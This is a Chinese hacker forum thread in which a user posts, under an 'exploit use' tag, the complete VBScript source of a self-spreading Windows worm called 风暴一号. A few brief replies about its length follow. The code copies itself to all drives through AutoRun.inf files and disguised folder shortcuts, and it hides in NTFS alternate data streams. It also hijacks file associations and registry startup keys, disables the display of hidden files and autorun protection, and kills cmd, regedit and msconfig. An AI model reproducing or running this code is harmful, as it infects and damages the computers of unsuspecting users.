中国红客联盟国际站联盟介绍联盟架构联盟章程发展历程联盟邮箱积分VIP捐助联盟收藏本站
请登录
立即注册
官方论坛首页BBS
联盟圈子Group
关于我们
红客大事记
贡献榜
搜索
当前位置:»官方论坛首页 中国红客联盟【技术分享区】 攻击技术探索 风暴一号-源代码

[漏洞利用] 风暴一号-源代码

 
733 5
悲年-王鹏博 2022-8-1 20:38:45 | 显示全部楼层 |阅读模式
  1. On Error Resume Next
  2. Dim Fso,WshShell
  3. Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
  4. Set WshShell=CreateObject("wScRipT.SHelL")
  5. Call Main()
  6. Sub Main()
  7.         On Error Resume Next
  8.         Dim Args, VirusLoad, VirusAss
  9.         Set Args=WScript.Arguments
  10.         VirusLoad=GetMainVirus(1)
  11.         VirusAss=GetMainVirus(0)
  12.         ArgNum=0
  13.        
  14.         Do While ArgNum < Args.Count
  15.                 Param=Param&" "&Args(ArgNum)
  16.                 ArgNum=ArgNum + 1
  17.         Loop
  18.         SubParam=LCase(Right(Param, 3))
  19.        
  20.         Select Case SubParam
  21.         Case "run"
  22.                 RunPath=Left(WScript.ScriptFullName, 2)
  23.                 Call Run(RunPath)
  24.                 Call InvadeSystem(VirusLoad,VirusAss)
  25.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  26.                
  27.         Case "txt", "log","ini" ,"inf"
  28.                 RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
  29.                 Call Run(RunPath)
  30.                 Call InvadeSystem(VirusLoad,VirusAss)
  31.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  32.                
  33.         Case "bat", "cmd"
  34.                 RunPath="CMD /c echo Hi!I'm here!&pause"
  35.                 Call Run(RunPath)
  36.                 Call InvadeSystem(VirusLoad,VirusAss)
  37.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  38.                
  39.         Case "reg"
  40.                 RunPath="regedit.exe "&""""&Trim(Param)&""""
  41.                 Call Run(RunPath)
  42.                 Call InvadeSystem(VirusLoad,VirusAss)
  43.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  44.                
  45.         Case "chm"
  46.                 RunPath="hh.exe "&""""&Trim(Param)&""""
  47.                 Call Run(RunPath)
  48.                 Call InvadeSystem(VirusLoad,VirusAss)
  49.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

  51.         Case "hlp"
  52.                 RunPath="winhlp32.exe "&""""&Trim(Param)&""""
  53.                 Call Run(RunPath)
  54.                 Call InvadeSystem(VirusLoad,VirusAss)
  55.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  56.                
  57.         Case "dir"
  58.                 RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""
  59.                 Call Run(RunPath)
  60.                 Call InvadeSystem(VirusLoad,VirusAss)
  61.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

  63.         Case "oie"
  64.                 RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
  65.                 Call Run(RunPath)
  66.                 Call InvadeSystem(VirusLoad,VirusAss)
  67.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

  69.         Case "omc"
  70.                 RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
  71.                 Call Run(RunPath)
  72.                 Call InvadeSystem(VirusLoad,VirusAss)
  73.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
  74.                
  75.         Case "emc"
  76.                 RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
  77.                 Call Run(RunPath)
  78.                 Call InvadeSystem(VirusLoad,VirusAss)
  79.                 Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

  81.         Case Else
  82.                 If PreDblInstance=True Then
  83.                         WScript.Quit
  84.                 End If
  85.                 Timeout = Datediff("ww", GetInfectedDate, Date) - 12
  86.                 If Timeout>0 And Month(Date) = Day(Date) Then
  87.                        Call VirusAlert()
  88.                        Call MakeJoke(CInt(Month(Date)))
  89.                 End If
  90.                 Call MonitorSystem()
  91.                
  92.         End Select
  93. End Sub

  95. Sub MonitorSystem()
  96.         On Error Resume Next
  97.         Dim ProcessNames, ExeFullNames
  98.         ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe")
  99.         VBSFullNames=Array(GetMainVirus(1))
  100.         Do
  101.                 Call KillProcess(ProcessNames)
  102.                 Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
  103.                 Call KeepProcess(VBSFullNames)
  104.                 WScript.Sleep 3000
  105.         Loop
  106. End Sub

  108. Sub InvadeSystem(VirusLoadPath,VirusAssPath)
  109.         On Error Resume Next
  110.         Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
  111.         Load_Value=""""&VirusLoadPath&""""
  112.         File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "
  113.         IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "
  114.         MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "
  115.         MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "
  116.         HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  117.         HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
  118.         HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
  119.         VirusCode=GetCode(WScript.ScriptFullName)
  120.         Version=1
  121.         HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"
  122.         HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"
  123.        
  124.         For Each Drive In Fso.Drives
  125.                 If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then
  126.                         DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"
  127.                                 Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
  128.                                 Call InfectRoot(Drive.DriveLetter,DiskVirusName)
  129.                 End If
  130.         Next
  131.        
  132.         If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then
  133.                 If GetFileSystemType(GetSystemDrive())="NTFS" Then
  134.                         Call CreateFile(VirusCode,VirusAssPath)
  135.                         Call CreateFile(VirusCode,VirusLoadPath)
  136.                         Call CopyFile(HostSourcePath,HostFilePath)
  137.                         Call SetHiddenAttr(HostFilePath)
  138.                 Else
  139.                         Call CreateFile(VirusCode, VirusAssPath)
  140.                         Call SetHiddenAttr(VirusAssPath)
  141.                         Call CreateFile(VirusCode,VirusLoadPath)
  142.                         Call SetHiddenAttr(VirusLoadPath)
  143.                         Call CopyFile(HostSourcePath, HostFilePath)
  144.                         Call SetHiddenAttr(HostFilePath)
  145.                 End If
  146.         End If
  147.        
  148.         If ReadReg(HCULoad)<>Load_Value  Then
  149.                 Call WriteReg (HCULoad, Load_Value, "")
  150.         End If
  151.        
  152.         If GetVersion() < Version Then
  153.                 Call WriteReg (HCUVer, Version, "")
  154.         End If
  155.        
  156.         If GetInfectedDate() = "" Then
  157.                 Call WriteReg (HCUDate, Date, "")
  158.         End If
  159.        
  160.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command")<>File_Value Then
  161.                 Call SetTxtFileAss(VirusAssPath)
  162.         End If
  163.        
  164.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command")<>File_Value Then
  165.                 Call SetIniFileAss(VirusAssPath)
  166.         End If
  167.        
  168.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command")<>File_Value Then
  169.                 Call SetInfFileAss(VirusAssPath)
  170.         End If
  171.        
  172.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command")<>File_Value Then
  173.                 Call SetBatFileAss(VirusAssPath)
  174.         End If
  175.        
  176.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command")<>File_Value Then
  177.                 Call SetCmdFileAss(VirusAssPath)
  178.         End If

  180.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command")<>File_Value Then
  181.                 Call SetRegFileAss(VirusAssPath)
  182.         End If
  183.        
  184.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command")<>File_Value Then
  185.                 Call SetchmFileAss(VirusAssPath)
  186.         End If
  187.        
  188.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command")<>File_Value Then
  189.                 Call SethlpFileAss(VirusAssPath)
  190.         End If
  191.        
  192.         If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command")<>IE_Value Then
  193.                 Call SetIEAss(VirusAssPath)
  194.         End If
  195.        
  196.         If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command")<>IE_Value Then
  197.                 Call SetIEAss(VirusAssPath)
  198.         End If
  199.        
  200.         If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command")<>MyCpt_Value1 Then
  201.                 Call SetMyComputerAss(VirusAssPath)
  202.         End If
  203.        
  204.         If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command")<>MyCpt_Value2 Then
  205.                 Call SetMyComputerAss(VirusAssPath)
  206.         End If
  207.        
  208.         Call RegSet()
  209. End Sub

  211. Sub CopyFile(source, pathf)
  212.         On Error Resume Next
  213.         If FSO.FileExists(pathf) Then
  214.                 FSO.DeleteFile pathf , True
  215.         End If       
  216.         FSO.CopyFile source, pathf
  217. End Sub

  219. Sub CreateFile(code, pathf)
  220.         On Error Resume Next
  221.         Dim FileText
  222.         If FSO.FileExists(pathf) Then
  223.                 Set FileText=FSO.OpenTextFile(pathf, 2, False)
  224.                 FileText.Write code
  225.                 FileText.Close
  226.         Else
  227.                 Set FileText=FSO.OpenTextFile(pathf, 2, True)
  228.                 FileText.Write code
  229.                 FileText.Close
  230.         End If
  231. End Sub

  233. Sub CreateFile(code, pathf)
  234.         On Error Resume Next
  235.         Dim FileText
  236.         If FSO.FileExists(pathf) Then
  237.                 Set FileText=FSO.OpenTextFile(pathf, 2, False)
  238.                 FileText.Write code
  239.                 FileText.Close
  240.         Else
  241.                 Set FileText=FSO.OpenTextFile(pathf, 2, True)
  242.                 FileText.Write code
  243.                 FileText.Close
  244.         End If
  245. End Sub

  247. Sub RegSet()
  248.         On Error Resume Next
  249.         Dim RegPath1 , RegPath2, RegPath3, RegPath4
  250.         RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
  251.         RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  252.         RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  253.         RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
  254.         Call WriteReg (RegPath1, 3, "REG_DWORD")
  255.         Call WriteReg (RegPath2, 2, "REG_DWORD")
  256.         Call WriteReg (RegPath3, 0, "REG_DWORD")
  257.         Call DeleteReg (RegPath4)
  258. End Sub

  260. Sub KillProcess(ProcessNames)
  261.         On Error Resume Next
  262.         Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
  263.         For Each ProcessName in ProcessNames
  264.                 Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")
  265.                 For Each Process in ProcessList
  266.                         IntReturn=Process.terminate
  267.                         If intReturn<>0 Then
  268.                                 WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False
  269.                         End If
  270.                 Next
  271.         Next
  272. End Sub

  274. Sub KillImmunity(D)
  275.         On Error Resume Next
  276.         ImmunityFolder=D&":\Autorun.inf"
  277.         If Fso.FolderExists(ImmunityFolder) Then
  278.                 WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True
  279.                 WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True
  280.         End If
  281. End Sub

  283. Sub KeepProcess(VBSFullNames)
  284.         On Error Resume Next
  285.         For Each VBSFullName in VBSFullNames
  286.                 If VBSProcessCount(VBSFullName) < 2 then
  287.                         Run("%SystemRoot%\system\svchost.exe "&VBSFullName)
  288.                 End If
  289.         Next
  290. End Sub

  292. Function GetSystemDrive()
  293.         GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)
  294. End Function

  296. Function GetFileSystemType(Drive)
  297.         Set d=FSO.GetDrive(Drive)
  298.         GetFileSystemType=d.FileSystem
  299. End Function

  301. Function ReadReg(strkey)
  302.         Dim tmps
  303.         Set tmps=CreateObject("WScript.Shell")
  304.         ReadReg=tmps.RegRead(strkey)
  305.         Set tmps=Nothing
  306. End Function

  308. Sub WriteReg(strkey, Value, vtype)
  309.         Dim tmps
  310.         Set tmps=CreateObject("WScript.Shell")
  311.         If vtype="" Then
  312.                 tmps.RegWrite strkey, Value
  313.         Else
  314.                 tmps.RegWrite strkey, Value, vtype
  315.         End If
  316.         Set tmps=Nothing
  317. End Sub

  319. Sub DeleteReg(strkey)
  320.         Dim tmps
  321.         Set tmps=CreateObject("WScript.Shell")
  322.         tmps.RegDelete strkey
  323.         Set tmps=Nothing
  324. End Sub

  326. Sub SetHiddenAttr(path)
  327.         On Error Resume Next
  328.         Dim vf
  329.         Set vf=FSO.GetFile(path)
  330.         Set vf=FSO.GetFolder(path)
  331.         vf.Attributes=6
  332. End Sub

  334. Sub Run(ExeFullName)
  335.         On Error Resume Next
  336.         Dim WshShell
  337.         Set WshShell=WScript.CreateObject("WScript.Shell")
  338.         WshShell.Run ExeFullName
  339.         Set WshShell=Nothing
  340. End Sub

  342. Sub InfectRoot(D,VirusName)
  343.         On Error Resume Next
  344.         Dim VBSCode
  345.         VBSCode=GetCode(WScript.ScriptFullName)
  346.         VBSPath=D&":"&VirusName
  347.         If FSO.FileExists(VBSPath)=False Then
  348.                 Call CreateFile(VBSCode, VBSPath)
  349.                 Call SetHiddenAttr(VBSPath)
  350.         End If
  351.         Set Folder=Fso.GetFolder(D&":")
  352.         Set SubFolders=Folder.Subfolders
  353.         For Each SubFolder In SubFolders
  354.                 SetHiddenAttr(SubFolder.Path)
  355.                 LnkPath=D&":"&SubFolder.Name&".lnk"
  356.                 TargetPath=D&":"&VirusName
  357.                 Args=""""&D&":"&SubFolder.Name& "\Dir"""
  358.                 If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then
  359.                         If Fso.FileExists(LnkPath)=True Then
  360.                                 FSO.DeleteFile LnkPath, True
  361.                         End If
  362.                         Call CreateShortcut(LnkPath,TargetPath,Args)
  363.                 End If
  364.         Next
  365. End Sub

  367. Sub CreateShortcut(LnkPath,TargetPath,Args)
  368.         Set Shortcut=WshShell.CreateShortcut(LnkPath)
  369.         with Shortcut
  370.                 .TargetPath=TargetPath
  371.                 .Arguments=Args
  372.                 .WindowStyle=4
  373.                 .IconLocation="%SystemRoot%\System32\Shell32.dll, 3"
  374.                 .Save
  375.         end with
  376. End Sub

  378. Sub CreateAutoRun(D,VirusName)
  379.         On Error Resume Next
  380.         Dim InfPath, VBSPath, VBSCode
  381.         InfPath=D&":\AutoRun.inf"
  382.         VBSPath=D&":"&VirusName
  383.         VBSCode=GetCode(WScript.ScriptFullName)
  384.         If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then
  385.                 Call CreateFile(VBSCode, VBSPath)
  386.                 Call SetHiddenAttr(VBSPath)
  387.                 StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"& VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""
  388.                 Call KillImmunity(D)
  389.                 Call CreateFile(StrInf, InfPath)
  390.                 Call SetHiddenAttr(InfPath)
  391.         End If
  392. End Sub

  394. Sub SetTxtFileAss(sFilePath)
  395.         On Error Resume Next
  396.         Dim Value
  397.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  398.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command", Value, "REG_EXPAND_SZ")
  399. End Sub

  401. Sub SetIniFileAss(sFilePath)
  402.         On Error Resume Next
  403.         Dim Value
  404.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  405.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command", Value, "REG_EXPAND_SZ")
  406. End Sub

  408. Sub SetInfFileAss(sFilePath)
  409.         On Error Resume Next
  410.         Dim Value
  411.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  412.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command", Value, "REG_EXPAND_SZ")
  413. End Sub

  415. Sub SetBatFileAss(sFilePath)
  416.         On Error Resume Next
  417.         Dim Value
  418.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  419.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command", Value, "REG_EXPAND_SZ")
  420. End Sub

  422. Sub SetCmdFileAss(sFilePath)
  423.         On Error Resume Next
  424.         Dim Value
  425.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  426.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command", Value, "REG_EXPAND_SZ")
  427. End Sub

  429. Sub SethlpFileAss(sFilePath)
  430.         On Error Resume Next
  431.         Dim Value
  432.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  433.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command", Value, "REG_EXPAND_SZ")
  434. End Sub

  436. Sub SetRegFileAss(sFilePath)
  437.         On Error Resume Next
  438.         Dim Value
  439.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  440.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command", Value, "REG_EXPAND_SZ")
  441. End Sub

  443. Sub SetchmFileAss(sFilePath)
  444.         On Error Resume Next
  445.         Dim Value
  446.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
  447.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command", Value, "REG_EXPAND_SZ")
  448. End Sub

  450. Sub SetIEAss(sFilePath)
  451.         On Error Resume Next
  452.         Dim Value
  453.         Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE "
  454.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command", Value, "REG_EXPAND_SZ")
  455.         Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command", Value, "REG_EXPAND_SZ")
  456. End Sub

  458. Sub SetMyComputerAss(sFilePath)
  459.         On Error Resume Next
  460.         Dim Value1,Value2
  461.         Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "
  462.         Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "
  463.         Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell", "", "REG_SZ")
  464.         Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command", Value1, "REG_EXPAND_SZ")
  465.         Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command", Value2, "REG_EXPAND_SZ")
  466. End Sub

  468. Function GetSerialNumber(Drv)
  469.         On Error Resume Next
  470.         Set d=fso.GetDrive(Drv)
  471.         GetSerialNumber=d.SerialNumber
  472.         GetSerialNumber=Replace(GetSerialNumber,"-","")
  473. End Function

  475. Function GetMainVirus(N)
  476.         On Error Resume Next
  477.         MainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"
  478.         If GetFileSystemType(GetSystemDrive())="NTFS" Then
  479.                 If N=1 Then
  480.                           GetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName
  481.                 End If
  482.                 If N=0 Then
  483.                           GetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName
  484.                 End If
  485.         Else
  486.                   GetMainVirus=Fso.GetSpecialFolder(N)&""&MainVirusName
  487.         End If
  488. End Function

  490. Function VBSProcessCount(VBSPath)
  491.         On Error Resume Next
  492.         Dim WMIService, ProcessList, Process
  493.         VBSProcessCount=0
  494.         Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
  495.         Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
  496.         For Each Process in ProcessList
  497.                 If InStr(Process.CommandLine, VBSPath)>0 Then
  498.                         VBSProcessCount=VBSProcessCount+1
  499.                 End If
  500.         Next
  501. End Function

  503. Function PreDblInstance()
  504.         On Error Resume Next
  505.         PreDblInstance=False
  506.         If VBSProcessCount(WScript.ScriptFullName)>= 3 Then
  507.                 PreDblInstance=True
  508.         End If
  509. End Function

  511. Function GetTargetPath(LnkPath)
  512.         On Error Resume Next
  513.         Dim Shortcut
  514.         Set Shortcut=WshShell.CreateShortcut(LnkPath)
  515.         GetTargetPath=Shortcut.TargetPath
  516. End Function

  518. Function GetCode(FullPath)
  519.         On Error Resume Next
  520.         Dim FileText
  521.         Set FileText=FSO.OpenTextFile(FullPath, 1)
  522.         GetCode=FileText.ReadAll
  523.         FileText.Close
  524. End Function

  526. Function GetVersion()
  527.         Dim VerInfo
  528.         VerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
  529.         If ReadReg(VerInfo)="" Then
  530.                 GetVersion=0
  531.         Else
  532.                 GetVersion=CInt(ReadReg(VerInfo))
  533.         End If
  534. End Function

  536. Sub VirusAlert()
  537.         On Error Resume Next
  538.         Dim HtaPath,HtaCode
  539.         HtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"
  540.         HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"
  541.         If FSO.FileExists(HtaPath)=False Then
  542.                 Call CreateFile(HtaCode, HtaPath)
  543.                 Call SetHiddenAttr(HtaPath)
  544.         End If
  545.         Call Run(HtaPath)
  546. End Sub

  548. Function GetInfectedDate()
  549.         On Error Resume Next
  550.         Dim DateInfo
  551.         DateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
  552.         If ReadReg(DateInfo)="" Then
  553.                 GetInfectedDate=""
  554.         Else
  555.                 GetInfectedDate=CDate(ReadReg(DateInfo))
  556.         End If
  557. End Function

  559. Sub MakeJoke(Times)
  560.         On Error Resume Next
  561.         Dim WMP, colCDROMs
  562.         Set WMP = CreateObject( "WMPlayer.OCX" )
  563.         Set colCDROMs = WMP.cdromCollection
  564.         If colCDROMs.Count >0 Then
  565.                 For i=1 to Times
  566.                         colCDROMs.Item(0).eject()
  567.                         WScript.Sleep 3000
  568.                         colCDROMs.Item(0).eject()
  569.                 Next
  570.         End If
  571.         Set WMP = Nothing
  572. End Sub
复制代码
回复

使用道具 举报

五云包子 2022-8-2 09:57:13 | 显示全部楼层
500多行,可以上GitHub了

点评

悲年-王鹏博
什么意思1  详情 回复 发表于 2022-8-7 13:01
回复 支持 反对

使用道具 举报

悲年-王鹏博 2022-8-7 13:01:51 | 显示全部楼层
五云包子 发表于 2022-8-2 09:57
500多行,可以上GitHub了

什么意思1
回复 支持 反对

使用道具 举报

shadow虚空幻影 2022-9-30 21:32:42 | 显示全部楼层
将近600行啊
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

悲年-王鹏博

精英红客

关注
  • 15
    主题
  • 2
    粉丝
  • 3
    关注
这家伙很蛇,什么都留下了

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行